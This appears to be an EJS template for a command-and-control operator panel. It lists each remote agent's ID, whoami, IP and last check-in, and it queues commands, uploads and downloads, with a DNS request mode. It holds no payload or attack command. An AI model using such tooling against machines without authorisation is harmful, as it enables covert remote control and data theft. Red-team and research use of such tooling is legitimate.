Agent Details

  • ID: <%= agentDetails[0] %>

  • Whoami: <%= agentDetails[1] %>

  • IP: <%= agentDetails[2] %>

  • LastTime: <%= agentDetails[3] %>

Add New Command

<% if(agentDetails[4]=="dns") { %>
Text Request
<% } %>

Count: <%= commands.length %>

<% for(var i = commands.length-1 ; i > -1; i--) { %> <% } %>
ID Command/Upload/Download State Delete

<%= commands[i][0] %>

<% if(commands[i][1] != "not") { %>
Command: <%= commands[i][1] %>
<% } if(commands[i][2] != "not") { %>
Upload: <%= commands[i][2] %>
<% } if(commands[i][4] != "not") { %>
Download: <%= commands[i][4] %>
<% } %>

<% if(commands[i][(commands[i].length-1)]=="0") {%>In Queue<%} else if(commands[i][(commands[i].length-1)]=="01") {%>Sending<%} else if(commands[i][(commands[i].length-1)]=="1") {%>Sended<%} else if(commands[i][(commands[i].length-1)]=="12") {%>Receiving<%} else {%>Received<%}%> Delete